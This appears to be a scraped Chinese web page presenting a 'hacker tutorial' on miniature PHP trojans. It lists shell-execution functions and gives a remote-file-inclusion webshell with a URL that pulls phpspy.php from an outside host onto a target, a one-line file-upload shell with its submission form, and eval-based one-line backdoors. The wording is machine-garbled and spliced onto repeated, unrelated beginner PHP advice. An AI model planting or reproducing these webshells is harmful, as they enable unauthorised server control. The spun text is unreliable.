PHP网页编程之黑客教程系列之微型PHP木马的切磋

给你的建议是，有些最常用的语句是需要记住的 比如if for while这些、其他的一般语句你只要知道有这个函数或者有这个功能就可以了，当你用的时候你可以凭借记忆搜索就可以了。   <P style="TEXT-INDENT: 2em">【编纂提醒】：此文仅供参考进修之用！ <P style="TEXT-INDENT: 2em">本文没有甚么出格的地方，仅求抛砖引玉。并送给和我一样菜的在PHP门边彷徨的伴侣。刚学PHP没几天，我就急于功成，所以有毛病及缺乏的地方请人人积极指出。 <P style="TEXT-INDENT: 2em">PHP语法的壮大是ASP瞠乎其后的，仅一个：就能够打探全部办事器的设置装备摆设。运转cmd，上传文件等，都长短常简捷的，如今用的好的PHP木马，莫过于angel的phpspy了。昨天hak_ban问怎样给PHP木马加密，我还没想到，然而关于写一个微型PHP木马，我想仍是很难被杀的。 <P style="TEXT-INDENT: 2em">这里复杂切磋一下几个函数可以作为木马的利用： <P style="TEXT-INDENT: 2em">1． 可以运转内部号令的几个函数：system,passthru,exec,shell_exec,popen。 <P style="TEXT-INDENT: 2em">例：只需将等保留为cmd.php及可完成运转内部号令的功效。这几个函数可以说是最早的微行php木马了，所以普通虚拟主机的设置也会将这些函数屏障的。 <P style="TEXT-INDENT: 2em">2．还记得WDB服装论坛的style.php的破绽吗？咱们可以使用这个做个很难被杀的小木马。以下： <P style="TEXT-INDENT: 2em">

1. <?php include($include);?>

复制代码

<P style="TEXT-INDENT: 2em">将其保留为1.php，咱们就能够挪用其他不撑持php办事器里的.php木马（如phpspy.php）来到达咱们的目标：http://target.com/1.php? Include=http://www.xxx.com/phpspy.php <P style="TEXT-INDENT: 2em">这里http://www.918x.com是不撑持php的，不然将会在http://www.xxx.com这台办事器运转phpspy.php,而不是方针办事器。 <P style="TEXT-INDENT: 2em">3． 这个仍是angel在Discuz 2.2F的进击中给咱们的一个十分好的上传木马，我没有改： <P style="TEXT-INDENT: 2em">

1. <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

复制代码

<P style="TEXT-INDENT: 2em">将其保留为up.php后，在当地提交表单： <P style="TEXT-INDENT: 2em">

1. <form ENCTYPE="multipart/form-data" ACTION="http://方针办事器/up.php" METHOD="POST"><input NAME="MyFile" TYPE="file"><input VALUE=" 提交 " TYPE="submit"></form>

复制代码

<P style="TEXT-INDENT: 2em">就能够把大个的php木即刻传上去。 <P style="TEXT-INDENT: 2em">4． 我一向在想有无同冰狐荡子的谁人ASP一句话木马一样经由过程当地表单提走运行的PHP木马。终究找到了函数：eval，在PHP4中文参考手册上它的语法申明： <P style="TEXT-INDENT: 2em">语法: <P style="TEXT-INDENT: 2em">

1. void eval(string code_str)；

复制代码

<P style="TEXT-INDENT: 2em">内容申明：本函数可将字符串当中的变量值代入，凡是用在处置数据库的材料上。参数 code_str 为欲处置的字符串。值得注重的是待处置的字符串要合适 PHP 的字符串格局，同时在开头处要有分号。利用本函数处置后的字符串会沿续到 PHP 法式停止。 <P style="TEXT-INDENT: 2em">咱们可以在方针主机上保留：为一个PHP文件（我想也能够插在PHP恣意文件里）。然后经由过程当地提交来到达目标，但与ASP分歧的是，在magic_quotes_gpc = on的时分，过滤的良多的字符，使得这个利用功效大大的减少。 <P style="TEXT-INDENT: 2em">关于这个PHP木马当地表单我做了良多次，还没有成熟的代码。还请高手指教。写好后会贡献给人人的。然而eval这个函数可以做微型PHP木马是不必质疑的。 PS：写完后，有人告知我，其实高手早就有微型的PHP木马了，只是没有公然。哎，我好愁闷啊，研讨的都是人家早就有了的功效。不论怎样，和人人分享一下我的研讨，但愿能失掉匡助和指教。
php   manual（PHP手册）肯定是要从网上下载一个的，它很权威，也很全面，我自己认为它是一本很好的参考书，但是不适合新手当教材使用。

对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用，而且里面的资料也比较有用，最好还是买个会员比较好，毕竟那些也是别人的工作成果。

我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题，通过搜索或是看php手册解决问题后，你会更加深刻的理解它们的工作原理，了解到php配置文件中的一些选项设置。

多看优秀程序员编写的代码，仔细理解他们解决问题的方法，对自身有很大的帮助。

最后介绍一个代码出错，但是老找不到错误方法，就是 go to wc （囧），出去换换气没准回来就找到错误啦。

有时候汉字的空格也能导致页面出错，所以在写代码的时候，要输入空格最好用引文模式。

,熟悉html,能用div+css，还有javascript，优先考虑linux。我在开始学习的时候，就想把这些知识一起学习，我天真的认为同时学习能够互相呼应，因为知识是相通的。

这些中手常用的知识，当你把我说的这些关键字都可以熟练运用的时候，你可以选择自己

环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候，我强烈建议多读php手册。

作为一个合格的coder 编码的规范是必须，命名方面我推崇“驼峰法”，另外就是自己写的代码最好要带注释，不然时间长了，就算是自己的代码估计看起来都费事，更不用说别人拉。

我还是推荐用firefox ，配上firebug 插件调试js能省下不受时间。谷歌的浏览器最好也不少用，因为谷歌的大侠们实在是太天才啦，把一些原来的js代码加了一些特效。

小鸟是第一次发帖（我习惯潜水的(*^__^*) 嘻嘻……），有错误之处还请大家批评指正，另外，前些日子听人说有高手能用php写驱动程序，真是学无止境，人外有人，天外有天。

Ps：以上纯属原创，如有雷同，纯属巧合

曾经犯过一个很低级的错误，我在文件命名的时候用了一个横线\\\\\\\'-\\\\\\\' 号，结果找了好几个小时的错误，事实是命名的时候 是不能用横线 \\\\\\\'-\\\\\\\' 的，应该用的是下划线  \\\\\\\'_\\\\\\\' ;

对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用，而且里面的资料也比较有用，最好还是买个会员比较好，毕竟那些也是别人的工作成果。

学习php的目的往往是为了开发动态网站，phper就业的要求也涵盖了很多。我大致总结为：精通php和mysql

至于模板嘛，各位高人一直以来就是争论不休，我一只小菜鸟就不加入战团啦，咱们新手还是多学点东西的好。

遇到出错的时候，我经常把错误信息直接复制到 google的搜索栏，一般情况都是能搜到结果的，不过有时候会搜出来一大片英文的出来，这时候就得过滤一下，吧中文的弄出来，挨着式方法。

建议加几个专业的phper的群，当然啦需要说话的人多，一处一点问题能有人回答你的，当然啦要让人回答你的问题，平时就得躲在里面聊天，大家混熟啦，愿意回答你问题的人自然就多啦。

爱上php，他也会爱上你。